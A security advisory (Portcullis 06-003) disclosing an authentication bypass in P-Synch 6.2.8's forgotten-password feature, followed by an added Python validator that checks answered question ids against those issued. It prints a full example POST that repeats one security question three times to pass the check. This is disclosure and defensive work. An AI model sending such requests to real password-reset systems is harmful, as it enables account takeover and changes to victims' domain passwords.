Portcullis Security Advisory No. 06-003

Vulnerable System:

M-Tech P-Synch Password Management Software

Version: 6.2.8

Other versions: Unknown.

Vulnerability Title:

P-Synch permits reduced authentication complexity in "Forgotten Password" mechanism.

Vulnerability discovery and development:

Portcullis Security Testing Services discovered this vulnerability.

Affected systems:

The vulnerability was found and verified against a system running on a Windows 2000 platform.

Vulnerability Detail:

It was noted that, in addition to the application failing to check that the supplied POST request corresponds to the questions presented to the user, it was possible to supply three instances of the same question and answer pair. Assuming that the presented answer is correct, the application authenticates the user successfully.

An example POST is detailed below:

POST /nph-psf.exe HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.7) Gecko/20050420 Firefox/1.0.6
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://192.168.1.1/nph-psf.exe
Content-Type: application/x-www-form-urlencoded
Content-Length: 259

TRANSACTION=C_RESPONSE&SESSKEY=F3zP51t%3D%21qR%5CnvJl%3D%7E0N&LANG=en-us&CSS=docs%2Fen-us%2Fstyle.css&MODEXT=&_VALUE_0=2&_QUES_0=QD-42ae7b35-02484&_VALUE_1=2&_QUES_1=QD-42ae7b35-02484&_VALUE_2=2&_QUES_2=QD-42ae7b35-02484&SUBMIT-QA.x=45&SUBMIT-QA.y=8
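The server-side check whose absence the detail above describes, as an added example (not Portcullis' or M-Tech's code): the response is accepted only if the answered question ids are exactly those issued to the session, each answered once. The names ISSUED, ENROLLED, extract_pairs and validate_response, the two QD-EXAMPLE ids and their answers are constructed assumptions.

```python
import hmac
from urllib.parse import parse_qs

# Form body from the advisory's example POST: one question/answer pair sent three times.
ADVISORY_BODY = (
    "TRANSACTION=C_RESPONSE&SESSKEY=F3zP51t%3D%21qR%5CnvJl%3D%7E0N&LANG=en-us"
    "&CSS=docs%2Fen-us%2Fstyle.css&MODEXT=&_VALUE_0=2&_QUES_0=QD-42ae7b35-02484"
    "&_VALUE_1=2&_QUES_1=QD-42ae7b35-02484&_VALUE_2=2&_QUES_2=QD-42ae7b35-02484"
    "&SUBMIT-QA.x=45&SUBMIT-QA.y=8"
)
# Constructed server-side state (assumption): the questions issued to this session
# and the enrolled answers. Only the first id and its answer "2" appear in the advisory.
ISSUED = ["QD-42ae7b35-02484", "QD-EXAMPLE-0002", "QD-EXAMPLE-0003"]
ENROLLED = {ISSUED[0]: "2", ISSUED[1]: "constructed-b", ISSUED[2]: "constructed-c"}


def extract_pairs(body):
    """Return [(question_id, answer), ...] from the _QUES_n / _VALUE_n fields."""
    form = parse_qs(body, keep_blank_values=True)
    pairs, n = [], 0
    while f"_QUES_{n}" in form:
        ques, value = form[f"_QUES_{n}"], form.get(f"_VALUE_{n}", [])
        if len(ques) != 1 or len(value) != 1:
            raise ValueError("repeated or missing field")
        pairs.append((ques[0], value[0]))
        n += 1
    return pairs


def validate_response(body, issued, enrolled):
    """Accept only if the answered questions are exactly the issued ones, once each."""
    try:
        pairs = extract_pairs(body)
    except ValueError as exc:
        return False, str(exc)
    ids = [q for q, _ in pairs]
    if len(set(ids)) != len(ids):
        return False, "duplicate question id"
    if set(ids) != set(issued):
        return False, "questions do not match those issued"
    ok = True
    for q, answer in pairs:  # check every answer; each comparison is constant-time
        ok &= hmac.compare_digest(answer.encode(), enrolled[q].encode())
    return ok, "ok" if ok else "wrong answer"


if __name__ == "__main__":
    print(validate_response(ADVISORY_BODY, ISSUED, ENROLLED))
```

The issued set must be held in server-side session state; taking it from the request would reintroduce the mismatch the advisory describes.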

Impact:

In conjunction with the discovery that the application fails to track which questions have been asked, it is possible for a malicious user who knows the answer to only one of the security questions associated with the target user to authenticate to the P-Synch application and modify the target user's domain password.

Exploit:

None required.

Vendor Status:

Notified via email 17 February 2006

Disclosure Policy:

Portcullis' Disclosure Policy can be viewed here.

Copyright:

Copyright © Portcullis Computer Security Limited 2006, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:

The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.